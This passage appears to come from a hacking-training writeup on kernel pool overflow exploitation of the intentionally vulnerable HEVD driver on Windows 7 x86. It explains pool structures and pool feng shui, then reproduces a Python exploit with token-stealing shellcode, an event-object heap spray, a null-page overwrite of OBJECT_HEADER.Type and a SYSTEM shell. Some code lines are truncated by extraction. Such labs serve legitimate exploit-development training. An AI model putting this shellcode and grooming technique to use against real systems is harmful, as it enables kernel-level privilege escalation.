running allocations, pages in use and help the system to keep track of reusable pool chunks. 

typedef struct _POOL_DESCRIPTOR 

{ 

/*0x000*/ enum _POOL_TYPE PoolType; 

union { 

/*0x004*/ struct _KGUARDED_MUTEX PagedLock; 

/*0x004*/ ULONG32 NonPagedLock; 

}; 


*0x040*/ LONG32 RunningAllocs; 

/*0x044*/ LONG32 RunningDeAllocs; 

/*0x048*/ LONG32 TotalBigPages; 

/*0x04C*/ LONG32 ThreadsProcessingDeferrals; 

/*0x050*/ ULONG32 TotalBytes; 

/*0x054*/ UINT8 _PADDING0_[0x2C]; 

/*0x080*/ ULONG32 PoolIndex; 

/*0x084*/ UINT8 _PADDING1_[0x3C]; 

/*0x0C0*/ LONG32 TotalPages; 

/*0x0C4*/ UINT8 _PADDING2_[0x3C]; 

/*0x100*/ VOID** PendingFrees; 

/*0x104*/ LONG32 PendingFreeDepth; 

/*0x108*/ UINT8 _PADDING3_[0x38]; 

/*0x140*/ struct _LIST_ENTRY ListHeads[512]; 

} POOL_DESCRIPTOR, *PPOOL_DESCRIPTOR; 

PendingFrees point to delayed free list, that is a singly-linked list of pool chunks waiting to be freed. 

ListHeads (or Free Lists) is an array of doubly-linked lists of free pool chunks of the same size. 

All pool chunks are preceded by the pool header. 

typedef struct _POOL_HEADER 

{ 

union { 

struct { 

/*0x000*/ UINT16 PreviousSize : 9; 

/*0x000*/ UINT16 PoolIndex : 7; 

/*0x002*/ UINT16 BlockSize : 9; 

/*0x002*/ UINT16 PoolType : 7; 

}; 

/*0x000*/ ULONG32 Ulong1; 

}; 

union { 

/*0x004*/ ULONG32 PoolTag; 

struct { 

/*0x004*/ UINT16 AllocatorBackTraceIndex; 

/*0x006*/ UINT16 PoolTagHash; 

}; 

}; 

} POOL_HEADER, *PPOOL_HEADER; 

PoolIndex provides the index into the associated pool descriptor array. 

The kernel uses singly-linked lookaside lists for faster allocation and deallocation of small pool chunks. 

Instead the pool descriptor ListHeads maintains chunks less than a page. 


Kernel Pool Layout 

The OBJECT_HEADER contains and index into ObTypeIndexTable, that is an array of pointers to the 

different OBJECT_TYPE structures. 


In Windows XP: 

In Windows 7: 


In this case the offset to the OkayToCloseProcedure is 0x074 

“The important part here is the offset to the "OkayToCloseProcedure". If, when the handle to the object is 

released and the chunk is freed, this value is not null the kernel will jump to the address and execute 

whatever it finds there.” 


Pool Feng Shui 

The goal here is to place a desired object just behind the vulnerable buffer. 


Exploitation 

“The fragmented state of the kernel pool make the locality of allocations unpredictable, the attacker must 

first defragment the kernel pool using kernel objects or other controllable memory allocations. 

The goal in this respect is to allocate all the free chunks such that the pool allocator returns a fresh page.” 

So let’s start to reach this goal! 

As We can see from the driver source code the Pool size is as follow: 

#define POOL_BUFFER_SIZE 504 

504 + 8 (pool header) = 0x200 

As well explained in https://www.fuzzysecurity.com/tutorials/expDev/20.html 

there are some steps to follow: 


“We will (1) get the non-paged pool in a predictable state, (2) trigger a controlled pool overflow, (3) take 

advantage of pool internals to set a shellcode callback and (4) free the corrupted pool chunk to get code 

execution!” 

“Our target object has a size of 0x200 so we need to spray something with that size or with an object which 

can be multiplied to that size. Fortunately, event objects have a size of 0x40, which multiplied by 8 nicely 

comes out at 0x200.” 

Summing all the concepts introduced, first We need to defragment the NonPagedPool allocating Event 

Object. (1) 

Then We need to allocate others Event Object to get predictable allocations (2), next We create 

NonPagedPool holes (3), allocate a process null page (4), overwrite the OBJECT_HEADER.Type with the 

null page in the vulnerable pool (5) and craft the fake null page with our shellcode pointer! (6) 

So when We’ll trigger the overflow the pool will be created in a predictable location in order to overflow 

exactly his structure. 

So when We free the NonPagedPool the execution pass to the OkayToCloseProcedure with the pointer to 

our shellcode! And We reach ring0 code execution! 

Here the complete exploit written by @GradiusX: From( https://github.com/GradiusX/HEVD-Python- 

Solutions/tree/master/Win7%20x86 ) 

import ctypes, os, struct, sys 

from ctypes import * 

from ctypes.wintypes import * 

ntdll = windll.ntdll 

kernel32 = windll.kernel32 

MEM_COMMIT = 0x00001000 

MEM_RESERVE = 0x00002000 

PAGE_EXECUTE_READWRITE = 0x00000040 

def heap_alloc_payload(): 

token_stealing_shellcode = ( 

#---[Setup] 

"\x60" # pushad 

"\x64\xA1\x24\x01\x00\x00" # mov eax, fs:[KTHREAD_OFFSET] 

"\x8B\x40\x50" # mov eax, [eax + EPROCESS_OFFSET] 


) 

"\x89\xC1" # mov ecx, eax (Current _EPROCESS structure) 

"\x8B\x98\xF8\x00\x00\x00" # mov ebx, [eax + TOKEN_OFFSET] 

#---[Copy System PID token] 

"\xBA\x04\x00\x00\x00" # mov edx, 4 (SYSTEM PID) 

"\x8B\x80\xB8\x00\x00\x00" # mov eax, [eax + FLINK_OFFSET] | 

"\x8B\x90\xF8\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET] 

"\x89\x91\xF8\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx 

#---[Recover] 

"\x61" # popad 

"\xC2\x10\x00" # ret 10 

payload_address = id(token_stealing_shellcode) + 20 

print "[+] Payload address: 0x%X" % payload_address 

return payload_address 

event_object_array_1 = [] 

event_object_array_2 = [] 

def pool_feng_shui_with_event_objects(): 

global event_object_array_1 


print "[+] Defragmenting heap" 

for x in range(10000): 

event_object_array_1.append(kernel32.CreateEventA(None, False, False, None)) 

print "[+] Allocating Event Objects" 

for y in range(5000): 

event_object_array_2.append(kernel32.CreateEventA(None, False, False, None)) 

print "[+] Freeing selected Event Objects" 

for x in range (0,5000,16): 

for y in range (8): 

kernel32.CloseHandle(event_object_array_2[ x + y ]) 

def free_remaining_event_objects(): 



print "[+] Freeing remaining Event Objects to trigger vuln .." 

for x in range(10000): 

kernel32.CloseHandle(event_object_array_1[x]) 


for x in range (8,5000,16): 

for y in range (8): 

kernel32.CloseHandle(event_object_array_2[ x + y ]) 

def NtAllocateVirtualMemory_shellcode_ptr(): 

base_address = c_void_p(0x1) 

null_size = c_int(0x1000) 

nt_result = ntdll.NtAllocateVirtualMemory(kernel32.GetCurrentProcess(), byref(base_address), 0, 

byref(null_size), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) 

shellcode_ptr = heap_alloc_payload() 

csrc = create_string_buffer("\x00" * 0x70 + struct.pack("

print "[+] Triggering Pool Overflow" 

kernel32.DeviceIoControl(driver_handle, 0x22200F, evil_input_ptr, evil_size, None, 

0,byref(dwReturn), None) 

free_remaining_event_objects() 

print "[*] Enjoy Elevated Privs !\r\n" 

os.system('cmd.exe') 

def preamble(): 

print "\r\n" 

print "HackSys Extreme Vulnerable Driver : Pool Overflow" 

print "Author: @GradiusX" 

print "References: AWE Kernel Exploitation" 

print " http://codemachine.com/article_objectheader.html" 

print " http://www.ivanlef0u.tuxfamily.org/?p=79" 

print "\r\n" 

if __name__ == '__main__': 

preamble() 

trigger_pool_overflow() 

And here the resulting privilege escalation:

Hacking Training

Create successful ePaper yourself

Delete template?

Save as template?